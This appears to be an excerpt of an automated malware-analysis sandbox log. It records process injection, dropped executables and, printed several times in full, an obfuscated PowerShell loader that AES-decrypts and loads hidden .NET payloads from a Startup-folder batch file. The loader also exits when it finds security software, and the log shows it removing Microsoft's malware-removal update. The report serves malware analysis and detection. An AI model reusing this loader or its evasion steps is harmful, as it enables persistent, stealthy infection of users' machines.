Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe base: 1A3CD8A0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 38AA5FC3E0
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E6BF5B0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B7C0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 38AA5FC4E0
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 50D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1FA08C40000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\WerFault.exe base: 1131A770000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074045001\b73119c98d.exe base: 3520000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F254490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F254490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F254490000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F252BA0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F252BA0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F252BA0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F24F120000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F24EF20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F24EF20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 2F24EF20000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B3A340000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B3A340000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B3A340000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B3A340000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21B3A340000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe base: 5710000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\SysWOW64\WerFault.exe base: 55D0000
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 38AA67C8A0

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe "C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Windows\System32\Conhost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Process created: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4628 -ip 4628
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 920
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown
Source: C:\Windows\System32\svchost.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\mypayload.bat';$cvim='entfexgrypfexgoinfexgtfexg'.replace('fexg', ''),'eleixmomeixmontixmoaixmotixmo'.replace('ixmo', ''),'decoszeomoszeproszeeoszesoszesosze'.replace('osze', ''),'cpuxvoppuxvytpuxvopuxv'.replace('puxv', ''),'rywrpeaywrpdlywrpiywrpnesywrp'.replace('ywrp', ''),'cgarcrgarcegarcategarcdgarcecgarcrgarcypgarctgarcorgarc'.replace('garc', ''),'loivflaivfldivfl'.replace('ivfl', ''),'chagsqknggsqkeegsqkxtgsqkegsqknsgsqkiogsqkngsqk'.replace('gsqk', ''),'maaauaiaaaunaaaumodaaauulaaaueaaau'.replace('aaau', ''),'spojxflitojxf'.replace('ojxf', ''),'ifgbonvfgbookfgboefgbo'.replace('fgbo', ''),'gevsbgtcuvsbgrrvsbgevsbgntvsbgprvsbgovsbgcevsbgsvsbgsvsbg'.replace('vsbg', ''),'trusbuansusbuforusbumusbufiusbunausbulbusbulusbuockusbu'.replace('usbu', ''),'friyufoiyufmiyufbaiyufse6iyuf4stiyufriniyufgiyuf'.replace('iyuf', '');powershell -w hidden;$modules=[system.diagnostics.process]::($cvim[11])().modules;if ($modules -match 'hmpalert.dll') { exit; };function dsolp($wsuto){$fdrhp=[system.security.cryptography.aes]::create();$fdrhp.mode=[system.security.cryptography.ciphermode]::cbc;$fdrhp.padding=[system.security.cryptography.paddingmode]::pkcs7;$fdrhp.key=[system.convert]::($cvim[13])('0l3qu7et4bhk3wbvagfjicwz8cespcifojtqhmr81xg=');$fdrhp.iv=[system.convert]::($cvim[13])('jifnsdytrqtk8ftun6ogsw==');$qwyhd=$fdrhp.($cvim[5])();$funrp=$qwyhd.($cvim[12])($wsuto,0,$wsuto.length);$qwyhd.dispose();$fdrhp.dispose();$funrp;}function mmhqh($wsuto){$zzdvj=new-object system.io.memorystream(,$wsuto);$rzpai=new-object system.io.memorystream;$bbtac=new-object system.io.compression.gzipstream($zzdvj,[io.compression.compressionmode]::($cvim[2]));$bbtac.($cvim[3])($rzpai);$bbtac.dispose();$zzdvj.dispose();$rzpai.dispose();$rzpai.toarray();}$zledh=[system.io.file]::($cvim[4])([console]::title);$qkjpw=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 5).substring(2))));$gxzxu=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 6).substring(2))));[system.reflection.assembly]::($cvim[6])([byte[]]$gxzxu).($cvim[0]).($cvim[10])($null,$null);[system.reflection.assembly]::($cvim[6])([byte[]]$qkjpw).($cvim[0]).($cvim[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\mypayload.bat';$cvim='entfexgrypfexgoinfexgtfexg'.replace('fexg', ''),'eleixmomeixmontixmoaixmotixmo'.replace('ixmo', ''),'decoszeomoszeproszeeoszesoszesosze'.replace('osze', ''),'cpuxvoppuxvytpuxvopuxv'.replace('puxv', ''),'rywrpeaywrpdlywrpiywrpnesywrp'.replace('ywrp', ''),'cgarcrgarcegarcategarcdgarcecgarcrgarcypgarctgarcorgarc'.replace('garc', ''),'loivflaivfldivfl'.replace('ivfl', ''),'chagsqknggsqkeegsqkxtgsqkegsqknsgsqkiogsqkngsqk'.replace('gsqk', ''),'maaauaiaaaunaaaumodaaauulaaaueaaau'.replace('aaau', ''),'spojxflitojxf'.replace('ojxf', ''),'ifgbonvfgbookfgboefgbo'.replace('fgbo', ''),'gevsbgtcuvsbgrrvsbgevsbgntvsbgprvsbgovsbgcevsbgsvsbgsvsbg'.replace('vsbg', ''),'trusbuansusbuforusbumusbufiusbunausbulbusbulusbuockusbu'.replace('usbu', ''),'friyufoiyufmiyufbaiyufse6iyuf4stiyufriniyufgiyuf'.replace('iyuf', '');powershell -w hidden;$modules=[system.diagnostics.process]::($cvim[11])().modules;if ($modules -match 'hmpalert.dll') { exit; };function dsolp($wsuto){$fdrhp=[system.security.cryptography.aes]::create();$fdrhp.mode=[system.security.cryptography.ciphermode]::cbc;$fdrhp.padding=[system.security.cryptography.paddingmode]::pkcs7;$fdrhp.key=[system.convert]::($cvim[13])('0l3qu7et4bhk3wbvagfjicwz8cespcifojtqhmr81xg=');$fdrhp.iv=[system.convert]::($cvim[13])('jifnsdytrqtk8ftun6ogsw==');$qwyhd=$fdrhp.($cvim[5])();$funrp=$qwyhd.($cvim[12])($wsuto,0,$wsuto.length);$qwyhd.dispose();$fdrhp.dispose();$funrp;}function mmhqh($wsuto){$zzdvj=new-object system.io.memorystream(,$wsuto);$rzpai=new-object system.io.memorystream;$bbtac=new-object system.io.compression.gzipstream($zzdvj,[io.compression.compressionmode]::($cvim[2]));$bbtac.($cvim[3])($rzpai);$bbtac.dispose();$zzdvj.dispose();$rzpai.dispose();$rzpai.toarray();}$zledh=[system.io.file]::($cvim[4])([console]::title);$qkjpw=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 5).substring(2))));$gxzxu=mmhqh (dsolp ([convert]::($cvim[13])([system.linq.enumerable]::($cvim[1])($zledh, 6).substring(2))));[system.reflection.assembly]::($cvim[6])([byte[]]$gxzxu).($cvim[0]).($cvim[10])($null,$null);[system.reflection.assembly]::($cvim[6])([byte[]]$qkjpw).($cvim[0]).($cvim[10])($null,$null); "
